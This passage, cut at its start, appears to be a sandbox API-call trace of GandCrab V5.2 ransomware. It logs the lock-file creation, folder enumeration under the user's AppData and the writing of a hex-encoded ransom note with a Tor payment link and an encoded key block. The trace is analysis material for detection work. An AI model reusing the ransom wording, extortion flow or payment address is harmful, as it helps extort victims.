x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.963] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0073.963] CloseHandle (hObject=0x2dc) returned 1 [0073.964] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.964] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.964] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x13, wMilliseconds=0x115)) [0073.964] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.964] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.964] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.965] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 121 [0073.965] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0073.966] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.966] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned 97 [0073.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0073.967] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x5039b8 [0073.967] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.967] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0073.967] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.967] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.967] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0073.967] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0073.967] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0073.967] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0073.967] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\" [0073.967] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.968] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.968] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.968] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.968] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.968] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.969] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.969] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\\\TITWMVJL-DECRYPT.txt") returned 123 [0073.969] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0073.973] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59